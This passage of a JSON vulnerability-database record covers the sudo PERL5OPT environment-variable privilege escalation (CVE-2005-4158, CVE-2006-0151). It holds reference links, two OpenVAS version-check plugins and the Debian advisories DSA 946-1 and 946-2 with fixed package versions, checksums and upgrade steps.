Advisory ID:18102](https://secuniaresearch.flexerasoftware.com/advisories/18102/)\n[Secunia Advisory ID:18308](https://secuniaresearch.flexerasoftware.com/advisories/18308/)\n[Secunia Advisory ID:18463](https://secuniaresearch.flexerasoftware.com/advisories/18463/)\n[Secunia Advisory ID:18549](https://secuniaresearch.flexerasoftware.com/advisories/18549/)\n[Secunia Advisory ID:18156](https://secuniaresearch.flexerasoftware.com/advisories/18156/)\n[Secunia Advisory ID:18558](https://secuniaresearch.flexerasoftware.com/advisories/18558/)\n[Secunia Advisory ID:21692](https://secuniaresearch.flexerasoftware.com/advisories/21692/)\n[Secunia Advisory ID:18906](https://secuniaresearch.flexerasoftware.com/advisories/18906/)\nOther Advisory URL: http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2005:234\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:159\nOther Advisory URL: http://www.sudo.ws/sudo/alerts/perl_env.html\nOther Advisory URL: http://www.trustix.org/errata/2006/0002/\nOther Advisory URL: http://www.debian.org/security/2006/dsa-946\nOther Advisory URL: http://www.ubuntulinux.org/usn/usn-235-1\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2006_02_sr.html\nISS X-Force ID: 23102\n[CVE-2005-4158](https://vulners.com/cve/CVE-2005-4158)\n[CVE-2006-0151](https://vulners.com/cve/CVE-2006-0151)\nBugtraq ID: 15394\n", "modified": "2005-11-10T07:17:59", "published": "2005-11-10T07:17:59", "href": "https://vulners.com/osvdb/OSVDB:20764", "id": "OSVDB:20764", "type": "osvdb", "title": "Sudo PERL5OPT Environment Cleaning Multiple Variable Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "The remote host is missing an update to sudo\nannounced via advisory DSA 946-1.\n\nIt has been discovered that sudo, a privileged program, that provides\nlimited super user privileges to specific users, passes several\nenvironment variables to the program that runs with elevated\nprivileges. In the case of include paths (e.g. for Perl, Python, Ruby\nor other scripting languages) this can cause arbitrary code to be\nexecuted as privileged user if the attacker points to a manipulated\nversion of a system library.\n\nThis update alters the former behaviour of sudo and limits the number\nof supported environment variables to LC_*, LANG, LANGUAGE and TERM.\nAdditional variables are only passed through when set as env_check in\n/etc/sudoers, which might be required for some scripts to continue to\nwork.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.5.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56192", "href": "http://plugins.openvas.org/nasl.php?oid=56192", "type": "openvas", "title": "Debian Security Advisory DSA 946-1 (sudo)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_946_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 946-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.6.8p12-1.\n\nWe recommend that you upgrade your sudo package. For unstable\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20946-1\";\ntag_summary = \"The remote host is missing an update to sudo\nannounced via advisory DSA 946-1.\n\nIt has been discovered that sudo, a privileged program, that provides\nlimited super user privileges to specific users, passes several\nenvironment variables to the program that runs with elevated\nprivileges. In the case of include paths (e.g. for Perl, Python, Ruby\nor other scripting languages) this can cause arbitrary code to be\nexecuted as privileged user if the attacker points to a manipulated\nversion of a system library.\n\nThis update alters the former behaviour of sudo and limits the number\nof supported environment variables to LC_*, LANG, LANGUAGE and TERM.\nAdditional variables are only passed through when set as env_check in\n/etc/sudoers, which might be required for some scripts to continue to\nwork.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.5.\";\n\n\nif(description)\n{\n script_id(56192);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:07:13 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 946-1 (sudo)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.6-1.5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.8p7-1.3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "The remote host is missing an update to sudo\nannounced via advisory DSA 946-2.\n\nThe former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this\nupdate.\n\nThe configuration option env_reset is now activated by default. It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text:\n\nIt has been discovered that sudo, a privileged program, that\nprovides limited super user privileges to specific users, passes\nseveral environment variables to the program that runs with\nelevated privileges. In the case of include paths (e.g. for Perl,\nPython, Ruby or other scripting languages) this can cause arbitrary\ncode to be executed as privileged user if the attacker points to a\nmanipulated version of a system library.\n\nThis update alters the former behaviour of sudo and limits the\nnumber of supported environment variables to LC_*, LANG, LANGUAGE\nand TERM. Additional variables are only passed through when set as\nenv_check in /etc/sudoers, which might be required for some scripts\nto continue to work.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56531", "href": "http://plugins.openvas.org/nasl.php?oid=56531", "type": "openvas", "title": "Debian Security Advisory DSA 946-2 (sudo)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_946_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 946-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.4.\n\nFor the unstable distribution (sid) the same behaviour will be\nimplemented soon.\n\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20946-2\";\ntag_summary = \"The remote host is missing an update to sudo\nannounced via advisory DSA 946-2.\n\nThe former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this\nupdate.\n\nThe configuration option env_reset is now activated by default. It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text:\n\nIt has been discovered that sudo, a privileged program, that\nprovides limited super user privileges to specific users, passes\nseveral environment variables to the program that runs with\nelevated privileges. In the case of include paths (e.g. for Perl,\nPython, Ruby or other scripting languages) this can cause arbitrary\ncode to be executed as privileged user if the attacker points to a\nmanipulated version of a system library.\n\nThis update alters the former behaviour of sudo and limits the\nnumber of supported environment variables to LC_*, LANG, LANGUAGE\nand TERM. Additional variables are only passed through when set as\nenv_check in /etc/sudoers, which might be required for some scripts\nto continue to work.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.\";\n\n\nif(description)\n{\n script_id(56531);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:07:13 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 946-2 (sudo)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.6-1.6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.8p7-1.4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 946-2 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 8th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : sudo\nVulnerability : missing input sanitising\nProblem type : local\nDebian-specific: no\nCVE IDs : CVE-2005-4158 CVE-2006-0151\nDebian Bug : 342948\n\nThe former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this\nupdate.\n\nThe configuration option "env_reset" is now activated by default. It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text:\n\n It has been discovered that sudo, a privileged program, that\n provides limited super user privileges to specific users, passes\n several environment variables to the program that runs with\n elevated privileges. In the case of include paths (e.g. for Perl,\n Python, Ruby or other scripting languages) this can cause arbitrary\n code to be executed as privileged user if the attacker points to a\n manipulated version of a system library.\n\n This update alters the former behaviour of sudo and limits the\n number of supported environment variables to LC_*, LANG, LANGUAGE\n and TERM. Additional variables are only passed through when set as\n env_check in /etc/sudoers, which might be required for some scripts\n to continue to work.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.4. \n\nFor the unstable distribution (sid) the same behaviour will be\nimplemented soon.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6.dsc\n Size/MD5 checksum: 589 fda4d1382149f25cfebf1699db73c2aa\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6.diff.gz\n Size/MD5 checksum: 14121 396faaedb67ff76a247a6946cae23d51\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6.orig.tar.gz\n Size/MD5 checksum: 333074 4da4bf6cf31634cc7a17ec3b69fdc333\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_alpha.deb\n Size/MD5 checksum: 152548 bbf4346a6956e646b5dd0c73059bb97c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_arm.deb\n Size/MD5 checksum: 142328 3f58b32ce7cb6334c391e53da32e6fcd\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_i386.deb\n Size/MD5 checksum: 135988 90c493e545de6fb4e69041ff3adb5e64\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_ia64.deb\n Size/MD5 checksum: 173384 8db6ba716e87235971e32e87d03f2c40\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_hppa.deb\n Size/MD5 checksum: 148504 87976f60402cac2cee6e7d58f7dd63c8\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_m68k.deb\n Size/MD5 checksum: 133596 fe52aae580b7b0bc3ff9ac36012cede0\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_mips.deb\n Size/MD5 checksum: 145228 933f52b4795e5acd1d69a10d569165b5\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_mipsel.deb\n Size/MD5 checksum: 145094 a4d7a6bdb7f26c1f29494a11ccf97a74\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_powerpc.deb\n Size/MD5 checksum: 141508 fd135af083103859e484e52119464662\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_s390.deb\n Size/MD5 checksum: 141078 2b5d766cce3ca1b94539d4965e97c01b\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.6_sparc.deb\n Size/MD5 checksum: 143808 39b46d2ca3289c4f2bd7d0228fc4eef7\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4.dsc\n Size/MD5 checksum: 573 40676c986431100eef088b1f3b3c1e03\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4.diff.gz\n Size/MD5 checksum: 21602 6cf5325a202a70e62c2a662e9de3d6c5\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7.orig.tar.gz\n Size/MD5 checksum: 585302 ad65d24f20c736597360d242515e412c\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_alpha.deb\n Size/MD5 checksum: 177688 64d7d8eb1188d58f197e121c55ce9ca0\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_amd64.deb\n Size/MD5 checksum: 171058 6870002928d01d45e0a5287cc2017a70\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_arm.deb\n Size/MD5 checksum: 164372 31031e0fc73dd4a1a6cc57a44b514f88\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_i386.deb\n Size/MD5 checksum: 160676 9eda34ab034ad6ab65e4f3ea1876015e\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_ia64.deb\n Size/MD5 checksum: 195934 1df26a3372ea03ac840a40266fbf48d6\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_hppa.deb\n Size/MD5 checksum: 171542 8e0ad3c6f597e27169864daf90eccb16\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_m68k.deb\n Size/MD5 checksum: 155874 900bed288f532882a0cccb798f871d77\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_mips.deb\n Size/MD5 checksum: 169346 0f2094e3a4c51c83e9975b57a48b15a2\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_mipsel.deb\n Size/MD5 checksum: 169392 6be4e3681b8dc4ddc9777ed1f186285f\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_powerpc.deb\n Size/MD5 checksum: 166290 76386481e58f6cfcd53c394877792950\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_s390.deb\n Size/MD5 checksum: 169100 bab22d31f43acc189ec97458f5047133\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.4_sparc.deb\n Size/MD5 checksum: 163168 e0cdf1a6ed38504a0b31904aa7c654cc\n\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2006-04-08T00:00:00", "published": "2006-04-08T00:00:00", "id": "DEBIAN:DSA-946-2:8641C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00115.html", "title": "[SECURITY] [DSA 946-2] New sudo packages fix privilege escalation", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:07", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 946-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJanuary 20th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : sudo\nVulnerability : missing input sanitising\nProblem type : local\nDebian-specific: no\nCVE IDs : CVE-2005-4158 CVE-2006-0151\nDebian Bug : 342948\n\nIt has been discovered that sudo, a privileged program, that provides\nlimited super user privileges to specific users, passes several\nenvironment variables to the program that runs with elevated\nprivileges. In the case of include paths (e.g. for Perl, Python, Ruby\nor other scripting languages) this can cause arbitrary code to be\nexecuted as privileged user if the attacker points to a manipulated\nversion of a system library.\n\nThis update alters the former behaviour of sudo and limits the number\nof supported environment variables to LC_*, LANG, LANGUAGE and TERM.\nAdditional variables are only passed through when set as env_check in\n/etc/sudoers, which might be required for some scripts to continue to\nwork.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.5.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.6.8p12-1.\n\nWe recommend that you upgrade your sudo package. For unstable\n"Defaults = env_reset" need to be addeed to /etc/sudoers manually.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5.dsc\n Size/MD5 checksum: 587 5283a27497c0b72d5b6e76f9b667e01e\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5.diff.gz\n Size/MD5 checksum: 12656 f222453e31614c7acfc5f2dacfa50b7b\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6.orig.tar.gz\n Size/MD5 checksum: 333074 4da4bf6cf31634cc7a17ec3b69fdc333\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_alpha.deb\n Size/MD5 checksum: 151566 0962195516363a6c70b74f41891df48a\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_arm.deb\n Size/MD5 checksum: 141552 b302ac8539e200fa462b36486496c4d3\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_i386.deb\n Size/MD5 checksum: 135038 6a4e4f7c16f10019bed84e62ba8ec57f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_ia64.deb\n Size/MD5 checksum: 172514 5ddbbf5863765b4cea3f385e0f0fe47a\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_hppa.deb\n Size/MD5 checksum: 147622 b285216580ae99baf70a03dfe42281f4\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_m68k.deb\n Size/MD5 checksum: 132792 08c2595bb7daf654dbbfd8714f1e1d3e\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_mips.deb\n Size/MD5 checksum: 144486 c58264be61e612b1e5bc79d20c956cfb\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_mipsel.deb\n Size/MD5 checksum: 144358 e84c5ae3472ea691625e5e8884873891\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_powerpc.deb\n Size/MD5 checksum: 140702 29508f07787ae9ae35d8d9ad631a3201\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_s390.deb\n Size/MD5 checksum: 140338 f4872d03a171887c001f93ab86ef79b2\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.6-1.5_sparc.deb\n Size/MD5 checksum: 143150 d80fb2c644c9171a19834711abde3df1\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3.dsc\n Size/MD5 checksum: 571 f913c6cb8244c9d003518129d88295e8\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3.diff.gz\n Size/MD5 checksum: 20818 b14d0f907459fa845431348b56a23649\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7.orig.tar.gz\n Size/MD5 checksum: 585302 ad65d24f20c736597360d242515e412c\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_alpha.deb\n Size/MD5 checksum: 176530 646d6d0833893f6a27a238c4c5be553b\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_amd64.deb\n Size/MD5 checksum: 170024 b83d86e9bf071815692c463eacda677c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_arm.deb\n Size/MD5 checksum: 163560 95555bc3a9c1f49580fe23af83519fca\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_i386.deb\n Size/MD5 checksum: 159630 f0548efecaa7216ff89c9af09c43b01f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_ia64.deb\n Size/MD5 checksum: 195026 2b209260c170ef372bfb7b5b7df4d8a3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_hppa.deb\n Size/MD5 checksum: 170398 b94e896f58fe39ad4a4cc2d3e93ca667\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_m68k.deb\n Size/MD5 checksum: 154978 8d963b31019230fbf94225c5af7e894d\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_mips.deb\n Size/MD5 checksum: 168416 36e928d024d13ad2cccab3113b1cdf6e\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_mipsel.deb\n Size/MD5 checksum: 168322 5151ab7efe69f880b47c2ee5075707f4\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_powerpc.deb\n Size/MD5 checksum: 165084 ce88c7f407b2825e221ae5da015bcbb9\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_s390.deb\n Size/MD5 checksum: 168052 42f00b514e932afd4027b36b2c1bf64e\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/s/sudo/sudo_1.6.8p7-1.3_sparc.deb\n Size/MD5 checksum: 162408 bb253571ca9c46d8c8675869e52c68b0\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2006-01-20T00:00:00", "published": "2006-01-20T00:00:00", "id": "DEBIAN:DSA-946-1:530F0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00019.html", "title": "[SECURITY] [DSA 946-1] New sudo packages fix privilege escalation", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
